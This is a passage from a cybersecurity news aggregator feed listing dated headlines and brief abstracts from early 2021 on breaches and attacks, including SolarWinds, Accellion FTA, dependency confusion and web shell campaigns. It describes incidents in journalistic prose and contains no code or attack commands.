Cybersecurity firm Qualys is the latest victim to have suffered a data breach after a zero-day vulnerability in its Accellion FTA server was exploited to steal hosted files. Source: BleepingComputer
March 3, 2021
Recovering from the SolarWinds hack could take 18 months Full Text
Abstract
Fully recovering from the SolarWinds hack will take the US government from a year to as long as 18 months, according to the head of the agency that is leading Washington’s recovery. Source: Technology Review
March 3, 2021
Microsoft: SolarWinds Attack Highlights Growing Sophistication of Nation State Actors Full Text
Abstract
Microsoft discusses the changing threat landscape. Source: Infosecurity Magazine
March 03, 2021
Cybersecurity firm Qualys likely latest victim of Accellion hacks Full Text
Abstract
Cybersecurity firm Qualys is the latest victim to have suffered a data breach after a zero-day vulnerability in its Accellion FTA server was exploited to steal hosted files. Source: BleepingComputer
March 3, 2021
Brand(ed) Lures and GuLoader - The New Face of Email-based Attacks Full Text
Abstract
After studying millions of email-based attacks, researchers note a unique trend in malware-stealing attempts and disclose details about the success recipe of a top malware used by them. Source: Cyware Alerts - Hacker News
March 3, 2021
Securing Space: The Next Frontier of Credential-Based Attacks Full Text
Abstract
Examples of critical infrastructure in space include the NASA satellites orbiting Earth, which are equipped with cameras and scientific sensors to collect data about the planet. Source: Nextgov
March 3, 2021
Attackers took over the Perl.com domain in September 2020 Full Text
Abstract
The Perl.com domain was hijacked in January, but a senior editor at the site revealed that the hackers took control of the domain in September 2020. The Perl.com domain was hijacked in January 2021, but according to Brian Foy, senior editor of Perl.com,... Source: Security Affairs
March 3, 2021
Update: Oxfam Australia confirms ‘supporter’ data accessed in cyber attack Full Text
Abstract
In an update on Monday, Oxfam Australia said it had found “supporter’s information on one of its databases was unlawfully accessed by an external party on 20 January 2021”. Source: IT News
March 2, 2021
Post-Cyberattack, Universal Health Services Faces $67M in Losses Full Text
Abstract
The Fortune-500 hospital network owner is facing steep costs in damages after a cyberattack impacted patient care and billing in September and October. Source: Threatpost
March 2, 2021
French multinational dairy Lactalis hit by a cyber attack Full Text
Abstract
French multinational dairy products corporation Lactalis disclosed a cyberattack, but claimed that it had no evidence of a data breach. France-based dairy giant Lactalis announced that it was hit by a cyber attack, but claimed that it had found no evidence... Source: Security Affairs
March 01, 2021
World’s leading dairy group Lactalis hit by cyberattack Full Text
Abstract
Lactalis, the world's leading dairy group, has disclosed a cyberattack after unknown threat actors breached some of the company's systems. Source: BleepingComputer
March 01, 2021
SolarWinds Blames Intern for Weak Password That Led to Biggest Attack in 2020 Full Text
Abstract
As cybersecurity researchers continue to piece together the sprawling SolarWinds supply chain attack, top executives of the Texas-based software services firm blamed an intern for a critical password lapse that went unnoticed for several years. The password in question, "solarwinds123", was originally believed to have been publicly accessible via a GitHub repository since June 17, 2018, before the misconfiguration was addressed on November 22, 2019. But in a hearing before the House Committees on Oversight and Reform and Homeland Security on SolarWinds on Friday, CEO Sudhakar Ramakrishna testified that the password had been in use as early as 2017. While a preliminary investigation into the attack revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of the SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor, Crowdstrike's incident response efforts pointed to a revi... Source: The Hacker News
February 28, 2021
New Zealand-based cryptocurrency exchange Cryptopia hacked again Full Text
Abstract
The New Zealand-based cryptocurrency exchange Cryptopia suffered a new cyber heist while it is in liquidation due to a 2019 security breach. In 2019, the New Zealand-based cryptocurrency exchange Cryptopia disclosed a cyber attack that took place... Source: Security Affairs
February 27, 2021
T-Mobile customers were hit with SIM swapping attacks Full Text
Abstract
The telecommunications giant T-Mobile disclosed a data breach after some of its customers were apparently affected by SIM swap attacks. The telecommunications provider T-Mobile has disclosed a data breach after it became aware that some of its customers... Source: Security Affairs
February 26, 2021
Cryptocurrency exchange in liquidation due to hack, hacked again Full Text
Abstract
The same cryptocurrency exchange has been hacked again, and this time the attackers stole USD 45,000 (NZD 62,000) worth of crypto, reported local news network Stuff.co.NZ. Source: Hackread
February 26, 2021
FBI Investigating Michigan School District Hack Full Text
Abstract
Saginaw Township Community Schools targeted in ransomware attack. Source: Infosecurity Magazine
February 26, 2021
Poland’s CD Projekt delays Cyberpunk 2077 fix due to cyber attack Full Text
Abstract
Polish video games maker CD Projekt is delaying the release of a patch for its Cyberpunk 2077 game until the second half of March, after a cyberattack slowed down work on fixes for the troubled game. Source: Reuters
February 26, 2021
Npower Ditches App After Credential Stuffing Attacks Full Text
Abstract
Energy giant has informed affected customers. Source: Infosecurity Magazine
February 26, 2021
Oxford University Research Lab Studying the Coronavirus Becomes Victim of Cyberattack Full Text
Abstract
Oxford reported on Thursday that one of its research labs dedicated to studying COVID-19 suffered a cyberattack, following a Forbes investigation indicating external access to a number of its systems. Source: The Verge
February 25, 2021
Cyberattacks Launch Against Vietnamese Human-Rights Activists Full Text
Abstract
Vietnam joins the ranks of governments using spyware to crack down on human-rights defenders. Source: Threatpost
February 25, 2021
Credential Stuffing Attack on Energy Firm Npower’s App Exposed Customers’ Personal and Banking Details Full Text
Abstract
Contact details, birth dates, addresses, and partial bank account numbers are among the details believed stolen. But the affected accounts had been locked, Npower told the BBC. Source: BBC
February 25, 2021
U.S. Senators: AWS Infrastructure Used In SolarWinds Attack Full Text
Abstract
US Senators slammed Amazon Web Services for refusing to testify at a hearing about the SolarWinds intrusion given that the public cloud giant’s infrastructure was used in the attack. Source: CRN
February 25, 2021
Attackers scan for vulnerable VMware servers after PoC exploit release Full Text
Abstract
After security researchers developed and published proof-of-concept (PoC) exploit code targeting a critical vCenter remote code execution (RCE) vulnerability, attackers are now actively scanning for vulnerable Internet-exposed VMware servers. Source: BleepingComputer
February 24, 2021
CrowdStrike Slams Microsoft Over SolarWinds Hack Full Text
Abstract
Tech companies point fingers at customers and one another in SolarWinds Senate hearing. Source: Infosecurity Magazine
February 24, 2021
Five Eyes members warn of Accellion FTA extortion attacks Full Text
Abstract
Four members of Five Eyes, in collaboration with Singapore as an active contributor, have issued a joint security advisory about ongoing attacks and extortion attempts targeting organizations using the Accellion File Transfer Appliance (FTA). Source: BleepingComputer
February 24, 2021
Experts Warn of Notable Increase in QuickBooks Data File Theft Attacks Full Text
Abstract
New research has uncovered a significant increase in QuickBooks file data theft using social engineering tricks to deliver malware and exploit the accounting software. "A majority of the time, the attack involves basic malware that is often signed, making it hard to detect using antivirus or other threat detection software," researchers from ThreatLocker said in an analysis shared today with The Hacker News. QuickBooks is an accounting software package developed and marketed by Intuit. The spear-phishing attacks take the form of a PowerShell command that's capable of running inside of the email, the researchers said, adding that a second attack vector involves decoy documents sent via email messages that, when opened, run a macro to download malicious code which uploads QuickBooks files to an attacker-controlled server. Alternatively, bad actors have also been spotted running a PowerShell command called Invoke-WebRequests on target systems to upload relevant data to... Source: The Hacker News
February 24, 2021
Five Eyes warns of Accellion FTA attacks leading to extortion Full Text
Abstract
Five Eyes members have issued a joint security advisory regarding ongoing attacks and extortion attempts targeting organizations using the out-of-support Accellion File Transfer Appliance (FTA). Source: BleepingComputer
February 24, 2021
SonicWall Was Hacked. Was It Also Extorted? Full Text
Abstract
Cybersecurity companies advise their clients not to pay ransoms for good reasons: Pay once and the attackers may come back with their hand out again. It also promotes a cybercrime business model. Source: Gov Info Security
February 23, 2021
Shadow Attacks Let Attackers Replace Content in Digitally Signed PDFs Full Text
Abstract
Researchers have demonstrated a novel class of attacks that could allow a bad actor to potentially circumvent existing countermeasures and break the integrity protection of digitally signed PDF documents. Called "Shadow attacks" by academics from Ruhr-University Bochum, the technique uses the "enormous flexibility provided by the PDF specification so that shadow documents remain standard-compliant." The findings were presented yesterday at the Network and Distributed System Security Symposium (NDSS), with 16 of the 29 PDF viewers tested — including Adobe Acrobat, Foxit Reader, Perfect PDF, and Okular — found vulnerable to shadow attacks. To carry out the attack, a malicious actor creates a PDF document with two different contents: one which is the content that's expected by the party signing the document, and the other, a piece of hidden content that gets displayed once the PDF is signed. "The signers of the PDF receive the document, review it, and s... Source: The Hacker News
February 23, 2021
FireEye: Accellion FTA Attacks Could be FIN11 Full Text
Abstract
Cybercrime group linked to theft and extortion. Source: Infosecurity Magazine
February 23, 2021
South Carolina County Rebuilds Network After Hacking Full Text
Abstract
Hackers sent an email on Jan 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said. Source: Security Week
February 22, 2021
Ukraine sites suffered massive attacks launched from Russian networks Full Text
Abstract
Ukraine's government accused unnamed Russian traffic networks as the source of massive attacks on Ukrainian security and defense websites. Today Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security... Source: Security Affairs
February 22, 2021
Georgetown County has yet to recover from a sophisticated cyber attack Full Text
Abstract
The systems of Georgetown County were hacked at the end of January, and the county staff is still working to rebuild its computer network. The systems of Georgetown County were hit with a sophisticated cyber attack at the end of January,... Source: Security Affairs
February 22, 2021
Silicon Valley VC Firm Phished Full Text
Abstract
Sequoia Capital tells investors that it has been hacked. Source: Infosecurity Magazine
February 22, 2021
Criminals leveraging shift to remote work to develop targeted attacks Full Text
Abstract
Malwarebytes announced the findings of its report which explores how the global pandemic forced many employees to quickly become a remote workforce and confined consumers to their homes. Source: Help Net Security
February 22, 2021
Beneteau to Suspend Some Production After Cyberattack Full Text
Abstract
While the deployment of backup systems will allow Beneteau’s activities to start again, production at some of its units, particularly in France, will have to slow down or stop for a few days. Source: Bloomberg
February 21, 2021
Lakehead University shuts down campus network after cyberattack Full Text
Abstract
Canadian undergraduate research university Lakehead has been dealing with a cyberattack that forced the institution earlier this week to cut off access to its servers. Source: BleepingComputer
February 20, 2021
Sequoia Capital says it was hacked Full Text
Abstract
As per Axios, Sequoia Capital told its investors that some of their personal and financial information may have been accessed by a third party, after a Sequoia employee's email was successfully phished. Source: Axios
February 20, 2021
Lakehead University Shuts Down Campuses and Computers After Cyberattack Full Text
Abstract
In response to the attack, officials shut down all computer systems at the Thunder Bay and Orillia campuses. The message sent to faculty members doesn’t say how the threat actors managed to infiltrate the information systems of the university. Source: Bit Defender
February 19, 2021
Credential-Stuffing Attack Targets Regional Internet Registry Full Text
Abstract
RIPE NCC, the regional Internet registry for Europe, West Asia, and the former Soviet Union, said attackers attempted a credential-stuffing attack against its single sign-on service. Source: Threatpost
February 19, 2021
New Hack Lets Attackers Bypass MasterCard PIN by Using Them As Visa Card Full Text
Abstract
Cybersecurity researchers have disclosed a novel attack that could allow criminals to trick a point of sale terminal into transacting with a victim's Mastercard contactless card while believing it to be a Visa card. The research, published by a group of academics from ETH Zurich, builds on a study detailed last September that delved into a PIN bypass attack, permitting bad actors to leverage a victim's stolen or lost Visa EMV-enabled credit card for making high-value purchases without knowledge of the card's PIN, and even fool the terminal into accepting unauthentic offline card transactions. "This is not just a mere card brand mixup but it has critical consequences," researchers David Basin, Ralf Sasse, and Jorge Toro said. "For example, criminals can use it in combination with the previous attack on Visa to also bypass the PIN for Mastercard cards. The cards of this brand were previously presumed protected by PIN." Following responsible disc... Source: The Hacker News
February 19, 2021
Hiding in Plain Sight: What the SolarWinds Attack Revealed About Efficacy Full Text
Abstract
The SolarWinds breach is a reminder that, in general, any company that relies heavily on tools alone to secure its network infrastructure and software is taking an enormous risk. Source: Dark Reading
February 19, 2021
Internet Registry RIPE NCC Warns of Credential Stuffing Attack Full Text
Abstract
Attackers unsuccessfully targeted its single sign-on service. Source: Infosecurity Magazine
February 19, 2021
Internet Registry for Europe experienced a credential-stuffing attack Full Text
Abstract
The Regional Internet Registry for Europe and part of Asia (RIPE NCC) said its single sign-on (SSO) service experienced a suspected credential-stuffing attack, which caused a short outage. Source: Cyber News
February 18, 2021
Credential stuffing attack hit RIPE NCC: Members have to enable 2FA Full Text
Abstract
RIPE NCC has disclosed a failed credential stuffing attack against its infrastructure and is asking its members to enable 2FA for their accounts. RIPE NCC announced that it had suffered a credential stuffing attack attempting to gain access to single sign-on... Source: Security Affairs
February 18, 2021
RIPE NCC Internet Registry discloses SSO credential stuffing attack Full Text
Abstract
RIPE NCC is warning members that it suffered a credential stuffing attack attempting to gain access to single sign-on (SSO) accounts. Source: BleepingComputer
February 18, 2021
SolarWinds attack hit 100 companies and took months of planning, says White House Full Text
Abstract
The White House team leading the investigation into the SolarWinds hack is worried that the breach of 100 US companies has the potential to make the initial compromise a headache in future. Source: ZDNet
February 18, 2021
FBI: Telephony denial-of-service attacks can lead to loss of lives Full Text
Abstract
The Federal Bureau of Investigation (FBI) has warned of the harsh consequences of telephony denial-of-service (TDoS) attacks and has also provided the steps needed to mitigate their impact. Source: BleepingComputer
February 18, 2021
Top 10 most used MITRE ATT&CK tactics and techniques Full Text
Abstract
The MITRE ATT&CK framework is a well-known and widely used knowledge base of cyber adversary tactics, techniques and procedures, based on observations of real-world attacks. Source: Help Net Security
February 18, 2021
Centreon Says that Russian Hackers Hit Older Versions of the Software Full Text
Abstract
Centreon, a French software company, published a blog post providing clarification on a report published by ANSSI, CERTFR-2021-CTI-004. According to Centreon, Russian hackers... Source: Cyber Security News
February 18, 2021
Centreon says that recently disclosed campaigns only targeted obsolete versions of its open-source software Full Text
Abstract
The first attack spotted by ANSSI experts dates back to the end of 2017 and the campaign continued until 2020. Threat actors mainly targeted IT service providers, particularly web hosting. Source: Security Affairs
February 17, 2021
Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign Full Text
Abstract
The WatchDog malware has flown under the radar for two years in what researchers call one of the ‘largest’ Monero cryptojacking attacks ever. Source: Threatpost
February 17, 2021
Simon Fraser University Discloses Cyberattack Exposing Personal Information of About 200,000 Students, Staff, and Alumni Full Text
Abstract
The school says about 200,000 people were affected by the breach. The server contained personal information for some current and former students, faculty, staff, and student applicants. Source: CBC
February 17, 2021
Centreon: Sandworm Attacks Targeted Legacy Open Source Product Full Text
Abstract
French IT monitoring firm says around 15 organizations were impacted. Source: Infosecurity Magazine
February 16, 2021
Microsoft: Web Shells Attacks Spreading Like Wildfire Full Text
Abstract
According to Microsoft, web shells are among the critical tools used by hackers: it recorded around 140,000 web shells a month between August 2020 and January 2021. Source: Cyware Alerts - Hacker News
February 15, 2021
Cyberattack on Dutch Research Council (NWO) suspends research grants Full Text
Abstract
Servers belonging to the Dutch Research Council (NWO) have been compromised, forcing the organization to make its network unavailable and suspend subsidy allocation for the foreseeable future. Source: BleepingComputer
February 15, 2021
Frequent Attacks on Google Services and Products: A Worrisome Situation Full Text
Abstract
Google products and services have long been targets of cybercrime, largely due to their user base. Recently, many attacker groups attempted to exploit Google systems in a variety of campaigns. Source: Cyware Alerts - Hacker News
February 12, 2021
Microsoft: web shell attacks have doubled over the past year Full Text
Abstract
While they’re easy for attackers to set up, web shells can be difficult for defenders to detect, since they’re often targeted to specific servers and can hide in the noise of internet traffic, scanning, probing and unsuccessful attacks that most organizations see on a daily basis. Source: SCMagazine
February 12, 2021
Copycats imitate novel supply chain attack that hit tech giants Full Text
Abstract
This week, hundreds of new packages have been published to the npm open-source repository named after private components being used internally by major companies. These npm packages are identical to the proof-of-concept packages created by Alex Birsan, the researcher who had recently managed to infiltrate over 35 major tech firms. Source: BleepingComputer
February 12, 2021
Dependency Confusion - Novel Supply Chain Attack Technique Full Text
Abstract
Microsoft warned of a new type of attack technique that can be used to poison the app-building process. The attack was tested against at least 35 major tech firms. Source: Cyware Alerts - Hacker News
February 12, 2021
Browser Extensions Gain Traction as Attack Vector Full Text
Abstract
Malicious browser extensions are increasingly being used to infect millions of users across the world to monitor their browsing activity, exfiltrate stolen data, send malicious commands, and more. Source: Cyware Alerts - Hacker News
February 12, 2021
Copycat researchers imitate supply chain attack that hit tech giants Full Text
Abstract
This week, hundreds of new packages have been published to the npm open-source repository named after private components being used internally by major companies. These npm packages are identical to the proof-of-concept packages created by Alex Birsan, the researcher who had recently managed to infiltrate over 35 major tech firms. Source: BleepingComputer
February 12, 2021
Singtel Suffers Zero-Day Cyberattack, Damage Unknown Full Text
Abstract
The Tier 1 telecom giant was caught up in a coordinated, wide-ranging attack using unpatched security bugs in the Accellion legacy file-transfer program. Source: Threatpost
February 12, 2021
Florida Water Plant Hack: Leaked Credentials Found in Breach Database Full Text
Abstract
Researchers discovered credentials for the Oldsmar water treatment facility in the massive compilation of data from breaches posted just days before the attack. Source: Threatpost
February 12, 2021
Microsoft warns of the rise of web shell attacks Full Text
Abstract
Researchers from Microsoft are warning that the number of monthly web shell attacks has doubled since last year. Microsoft reported that the number of monthly web shell attacks has almost doubled since last year; its experts observed an average of 140,000... Source: Security Affairs
February 12, 2021
Blocked accounts abused in Evolution CMS SQL injection attacks Full Text
Abstract
On February 8, Synacktiv revealed two security flaws in the CMS and how a “blocked account” can be exploited to perform an “unauthenticated SQLi in Evolution CMS using the X-Forwarded-For header”. Source: The Daily Swig
February 11, 2021
Microsoft warns of an increasing number of web shell attacks Full Text
Abstract
Microsoft says that the number of monthly web shell attacks has almost doubled since last year, with an average of 140,000 such malicious tools being found on compromised servers every month. Source: BleepingComputer
February 11, 2021
UN Links North Korea to $281m Crypto Exchange Heist Full Text
Abstract
Most funds recovered but attack bears hallmarks of hermit kingdom. Source: Infosecurity Magazine
February 11, 2021
Poor Password Security Led to Recent Water Treatment Facility Hack Full Text
Abstract
New details have emerged about the remote computer intrusion at a Florida water treatment facility last Friday, highlighting a lack of adequate security measures needed to bulletproof critical infrastructure environments. The breach, which occurred last Friday, involved an unsuccessful attempt on the part of an adversary to increase sodium hydroxide dosage in the water supply to dangerous levels by remotely accessing the SCADA system at the water treatment plant. The system's plant operator, who spotted the intrusion, quickly took steps to reverse the command, leading to minimal impact. Now, according to an advisory published on Wednesday by the state of Massachusetts, unidentified cyber actors accessed the supervisory control and data acquisition (SCADA) system via TeamViewer software installed on one of the plant's several computers that were connected to the control system. Not only were these computers running 32-bit versions of the Windows 7 operating system, but... Source: The Hacker News
February 11, 2021
Researchers Hacked into Microsoft, Apple, more in Novel Supply Chain Attack Full Text
Abstract
Ethical hacker Alex Birsan has demonstrated that it is possible to breach the systems of tech giants by utilizing a novel supply... Source: Cyber Security News
February 10, 2021
Hybrid, Older Users Most-Targeted by Gmail Attackers Full Text
Abstract
Researchers at Google and Stanford analyzed 1.2 billion malicious emails to find out what makes users likely to get attacked. 2FA wasn’t a big factor. Source: Threatpost
February 10, 2021
Researcher Hacks Apple and Microsoft Full Text
Abstract
Novel supply chain attack allows researcher to hack internal systems of major companies. Source: Infosecurity Magazine
February 10, 2021
Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple Full Text
Abstract
Ethical hacker Alex Birsan developed a way to inject malicious code into open-source developer tools to exploit dependencies in organizations' internal applications. Source: Threatpost
February 10, 2021
Attackers Using Sophisticated Obfuscation Techniques to Evade Detection Full Text
Abstract
Security experts stumbled across an unusual DNS query that eventually led to the discovery of a multi-step obfuscated malware using nslookup.exe to hide the actual malicious intent. Source: Cyware Alerts - Hacker News
February 10, 2021
Web hosting provider shuts down after cyberattack Full Text
Abstract
A web hosting company named No Support Linux Hosting announced today it was shutting down after a hacker breached its internal systems and compromised its entire operation. Source: ZDNet
February 10, 2021
Dependency Confusion Supply-Chain Attack Hit Over 35 High-Profile Companies Full Text
Abstract
In what's a novel supply chain attack, a security researcher managed to breach over 35 major companies' internal systems, including those of Microsoft, Apple, PayPal, Shopify, Netflix, Yelp, Tesla, and Uber, and achieve remote code execution. The technique, called dependency confusion or a substitution attack, takes advantage of the fact that a piece of software may include components from a mix of private and public sources. These external package dependencies, which are fetched from public repositories during a build process, can pose an attack opportunity when an adversary uploads a higher version of a private module to the public feed, causing a client to automatically download the bogus "latest" version without requiring any action from the developer. "From one-off mistakes made by developers on their own machines, to misconfigured internal or cloud-based build servers, to systemically vulnerable development pipelines, one thing was clear: squatting val... Source: The Hacker News
February 10, 2021
Microsoft Discloses New ‘Dependency Confusion’ Attack Technique Used to Target 35 Major Tech Firms Full Text
Abstract
Microsoft published a white paper on a new technique called a "dependency confusion" or a "substitution attack" that can be used to poison the app-building process inside corporate environments. Source: ZDNet
February 9, 2021
A water-treatment hacking, and the complexities of risk mitigation Full Text
Abstract
How do you define risk? For those in the cybersecurity community, risk is usually defined by the degree of exposure an organization might have to losses tied to breaches or system attacks. But ask that same question of a hospital administrator struggling to treat COVID patients and the answer might be tied to the number of… Source: SCMagazine
February 09, 2021
Researcher hacks Microsoft, Apple, more in novel supply chain attack Full Text
Abstract
A researcher managed to hack systems of over 35 major tech companies including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla, Yelp, and Uber in a novel software supply chain attack. For his ethical hacking research efforts, the researcher has been awarded over $130,000 in bug bounties. Source: BleepingComputer
February 9, 2021
Supply Chain Attacks Back on the Forefront Full Text
Abstract
ESET researchers recently disclosed a cyber-espionage attack campaign targeting Asian gamers that jeopardized the update mechanism of NoxPlayer, an Android emulator for Macs and PCs. Source: Cyware Alerts - Hacker News
February 9, 2021
Microsoft, SolarWinds in dispute over nation-state attacks Full Text
Abstract
In separate blog posts last week, the two companies provided updates on their ongoing investigations into how nation-state actors initially compromised SolarWinds' environment. Source: Tech Target
February 9, 2021
Cyberpunk 2077 Developer Hit By Cyber-Attack Full Text
Abstract
Video game firm CD Projekt reveals a ransom note left by the attackers. Source: Infosecurity Magazine
February 9, 2021
Microsoft to notify Office 365 users of nation-state attacks Full Text
Abstract
Microsoft implements alerts for 'nation-state activity' in the Defender for Office 365 dashboard, to allow organizations to quickly respond. Since 2016, Microsoft has been alerting users of nation-state activity; now the IT giant has added the same service... Source: Security Affairs
February 8, 2021
Tens of Thousands of Patient Files Leaked in US Hospital Attacks Full Text
Abstract
Ransomware group suspected, but lack of malware perplexes. Source: Infosecurity Magazine
February 6, 2021
SolarWinds CEO Confirms Office 365 Email ‘Compromise’ Played Role In Broad-Based Attack Full Text
Abstract
SolarWinds CEO Sudhakar Ramakrishna verified this week that “suspicious activity” in its Office 365 environment allowed hackers to gain access to and exploit the SolarWinds Orion development environment. Source: CRN
February 5, 2021
Cyber-Attack on Woodland Trust Full Text
Abstract
Conservation charity notifies members of sophisticated December cyber-assault. Source: Infosecurity Magazine
February 4, 2021
Spotify Suffers Second Credential-Stuffing Cyberattack in 3 Months Full Text
Abstract
As many as 100,000 of the music streaming service’s customers could face account takeover.Threatpost
February 4, 2021
Automated Tools Increasingly Used to Launch Cyber-Attacks Full Text
Abstract
Over half of attacks detected by Barracuda involve the use of automation. Infosecurity Magazine
February 3, 2021
Second SolarWinds Attack Group Breaks into USDA Payroll — Report Full Text
Abstract
A second APT, potentially linked to the Chinese government, could be behind the Supernova malware.Threatpost
February 3, 2021
Alleged China-linked hackers used SolarWinds bug to breach National Finance Center Full Text
Abstract
Alleged China-linked hackers have exploited a flaw in the SolarWinds Orion software to hack systems at the U.S. National Finance Center. FBI investigators discovered that allegedly China-linked hackers have exploited a flaw in the SolarWinds Orion...Security Affairs
February 3, 2021
A New Supply Chain Attack Targets Gaming Companies in Asia Full Text
Abstract
ESET researchers uncover a new supply-chain attack used in a cyberespionage operation targeting online‑gaming communities in Asia. The new...Cyber Security News
February 2, 2021
US federal payroll agency hacked using SolarWinds software flaw Full Text
Abstract
The FBI has discovered that the National Finance Center (NFC), a U.S. Department of Agriculture (USDA) federal payroll agency, was compromised by exploiting a SolarWinds Orion software flaw, according to a Reuters report.BleepingComputer
February 2, 2021
South Carolina County Still Reeling from January Cyber-Attack Full Text
Abstract
Georgetown County still working to repair network brought down by cyber-criminals. Infosecurity Magazine
February 2, 2021
CISA: Many victims of SolarWinds hackers had no direct connection to SolarWinds Full Text
Abstract
The U.S. CISA reveals that many of the victims of the SolarWinds hackers had no direct connection to SolarWinds. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that many of the organizations targeted by SolarWinds hackers...Security Affairs
February 1, 2021
Operation NightScout: supply chain attack on NoxPlayer Android emulator Full Text
Abstract
Experts uncovered a new supply chain attack leveraging the update process of NoxPlayer, a free Android emulator for PCs and Macs. A new supply chain attack made the headlines, a threat actor has compromised the update process of NoxPlayer, a free...Security Affairs
February 1, 2021
British Mensa Website Hack Results in Theft of Members’ Personal Data Full Text
Abstract
British Mensa, the society for people with high IQs, failed to properly secure the passwords on its website, prompting a hack on its website that has resulted in the theft of members’ personal data.Forbes
February 1, 2021
Chopper ASPX web shell used in targeted attack Full Text
Abstract
Web shells can be embedded on servers and can be used by attackers to launch arbitrary code. In as little as 15 bytes, web shells can enable remote administration of an infected machine or system.Trend Micro
January 31, 2021
USCellular Hacked – Hackers Gained access to its CRM Software Full Text
Abstract
USCellular is one of the mobile network operators that protects its customers' privacy and strictly follows all its protection policies. But, recently,... Cyber Security News
January 30, 2021
UScellular data breach: attackers ported customer phone numbers Full Text
Abstract
US wireless carrier UScellular discloses data breach, personal information of customers may have been exposed and their phone numbers ported. US wireless carrier UScellular discloses a data breach that exposed personal information of its customers. United...Security Affairs
January 29, 2021
As SolarWinds spooks tech firms into rechecking code, some won’t like what they find Full Text
Abstract
If more attacks are uncovered, end-user organizations must apply lessons learned from SolarWinds and take decisive action.SCMagazine
January 29, 2021
Domain for programming website Perl.com hijacked Full Text
Abstract
Threat actors took over the domain name perl.com and pointed it to an IP address associated with malware campaigns. Attackers have taken over the official domain name of The Perl Foundation perl.com and pointed it to an IP address associated with...Security Affairs
January 29, 2021
Does SolarWinds change the rules in offensive cyber? Experts say no, but offer alternatives Full Text
Abstract
While tempting, most experts agree that hack-back strategies are a bad idea for companies. But there are tactics that can help deter nation-state actors and limit their ability to penetrate networks.SCMagazine
January 29, 2021
Attacks on Individuals Fall as Cybercrime Shifts Tactics Full Text
Abstract
Cybercriminals shifted away from stealing individual consumers’ information in 2020 to focus on bigger, more profitable attacks on businesses, as per a report from the Identity Theft Resource Center.Security Week
January 29, 2021
A Fifth of Sunburst Backdoor Victims from Manufacturing Industry Full Text
Abstract
18% of all victims of the Sunburst backdoor are manufacturing organizations. Infosecurity Magazine
January 29, 2021
Perl.com domain stolen, now using IP address tied to malware Full Text
Abstract
The domain name perl.com was stolen this week and now points to an IP address associated with malware campaigns. BleepingComputer
January 29, 2021
Perl-clutching hijackers appear to have seized control of 33-year-old programming language’s .com domain Full Text
Abstract
The domain hijacking incident appears to have followed the age-old path of an attacker pouncing on a compromised account and swiping the domain rather than a simple expiration.The Register
January 28, 2021
Hezbollah hackers attack unpatched Atlassian servers at telcos, ISPs Full Text
Abstract
Volatile Cedar, an advanced hacker group believed to be connected to the Lebanese Hezbollah Cyber Unit, has been silently attacking companies around the world in espionage operations.BleepingComputer
January 28, 2021
Blind TCP/IP hijacking is resurrected for Windows 7 Full Text
Abstract
Although Microsoft deemed the bug “very difficult” to exploit and therefore only fixed it in Windows 8, researcher Adam Zabrocki says that he was able to rework the attack for use against Windows 7.The Daily Swig
January 28, 2021
Mimecast Confirms SolarWinds Hack as List of Security Vendor Victims Snowball Full Text
Abstract
A growing number of cybersecurity vendors like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys are confirming being targeted in the espionage attack.Threatpost
January 27, 2021
Hundreds of Industrial Organizations Received Sunburst Malware in SolarWinds Attack Full Text
Abstract
Kaspersky’s industrial cybersecurity researchers analyzed a list of nearly 2,000 domains impacted by Sunburst and estimated that roughly 32% of them were associated with industrial organizations.Security Week
January 27, 2021
More Security Vendors Admit to SolarWinds Attacks Full Text
Abstract
Scale of the cyber-espionage campaign continues to grow. Infosecurity Magazine
January 27, 2021
New Attack Could Let Remote Hackers Target Devices On Internal Networks Full Text
Abstract
A newly devised variant of the NAT Slipstreaming attack can be leveraged to compromise and expose any device in an internal network, according to the latest research. Detailed by enterprise IoT security firm Armis, the new attack (CVE-2020-16043 and CVE-2021-23961) builds on the previously disclosed technique to bypass routers and firewalls and reach any unmanaged device within the internal network from the Internet. First disclosed by security researcher Samy Kamkar in late October 2020, the JavaScript-based attack relied on luring a user into visiting a malicious website to circumvent browser-based port restrictions and allow the attacker to remotely access TCP/UDP services on the victim's device, even those that were protected by a firewall or NAT. Although partial mitigations were released on November 11 to thwart the attack in Chrome 87, Firefox 84, and Safari by preventing connections on port 5060 or 5061, Armis researchers Ben Seri and Gregory Vishnipolsky... The Hacker News
January 27, 2021
Manufacturing Giant Suffers Major Cyber-Disruption Full Text
Abstract
Attack bears the hallmarks of ransomware. Infosecurity Magazine
January 26, 2021
Fidelis, Mimecast, Palo Alto Networks, Qualys also impacted by SolarWinds hack Full Text
Abstract
Security vendors Fidelis, Mimecast, Palo Alto Networks, and Qualys revealed that they were also impacted by the SolarWinds supply chain attack. The SolarWinds supply chain attack is worse than initially thought; other security providers confirmed that they... Security Affairs
January 26, 2021
BEC attack techniques exploit Microsoft 365 messages Full Text
Abstract
Attackers exploit Microsoft 365 “read receipt” and “out of office” message loopholes to evade auto-remediation of a malicious email.SCMagazine
January 26, 2021
South Carolina County Suffers Weekend Cyberattack Full Text
Abstract
A statement from Georgetown County’s local government said the county’s computer network “suffered a major infrastructure breach over the weekend.” Most of the county’s electronic systems, including emails, were impacted.Security Week
January 25, 2021
Leading crane maker Palfinger hit in global cyberattack Full Text
Abstract
Leading crane and lifting manufacturer Palfinger is targeted in an ongoing cyberattack that has disrupted IT systems and business operations.BleepingComputer
January 25, 2021
SonicWall Probes Attack Using Zero-Days in Own Products Full Text
Abstract
SMA 100 Series under investigation after “sophisticated” attack. Infosecurity Magazine
January 24, 2021
SonicWall says it was hacked using zero-days in its own products Full Text
Abstract
Networking device maker SonicWall has disclosed that it is investigating a security breach of its internal network after detecting what it described as a "coordinated attack."ZDNet
January 23, 2021
SonicWall network attacked via zero days in its VPN and secure access solutions Full Text
Abstract
Cybersecurity firm SonicWall disclosed Friday night that hackers attacked the company’s internal networks by first exploiting zero-day vulnerabilities in its very own secure remote access products. SC Media received an anonymous tip Friday that SonicWall had suffered an attack, but did not get confirmation ahead of the disclosure by the company. SonicWall, whose product line…SCMagazine
January 23, 2021
